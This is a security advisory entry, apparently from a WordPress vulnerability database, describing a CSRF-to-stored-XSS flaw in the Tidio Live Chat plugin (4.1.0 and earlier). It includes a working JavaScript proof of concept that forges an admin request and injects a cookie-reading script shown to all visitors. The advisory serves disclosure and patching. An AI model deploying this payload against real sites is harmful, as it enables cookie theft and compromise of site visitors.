Tidio Live Chat <= 4.1.0 CSRF to Stored XSS



Description
A CSRF vulnerability in the Tidio Live Chat WordPress Plugin <= 4.1.0 allows attackers to trick admins into adding a Stored XSS payload presented to all visitors.

Fixed in 4.2.0.
Proof of Concept
<script>
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https:\/\/wordpress.local\/wp-admin\/admin-ajax.php?action=tidio_chat_save_keys", true);
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "de,en-US;q=0.7,en;q=0.3");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
    xhr.withCredentials = true;
    var body = "private_key=paul_dannewitz_poc&public_key=tests\x3c/script\x3e\x3cscript\x3ealert(document.cookie)\x3c/script\x3e";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
</script>

Affects Plugin

fixed in version 4.2.0

References

URL https://dannewitz.ninja/posts/tidio-livechat-wordpress-plugin-csrf-to-stored-xss
URL https://plugins.trac.wordpress.org/changeset/2186087/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Paul Dannewitz
Submitter Paul Dannewitz
Submitter Website https://dannewitz.ninja
Submitter Twitter padannewitz
Views 3941
Verified No
WPVDB ID 9938

Timeline

Publicly Published 2019-11-05 (about 1 month ago)
Added 2019-11-05 (about 1 month ago)
Last Updated 2019-11-28 (14 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin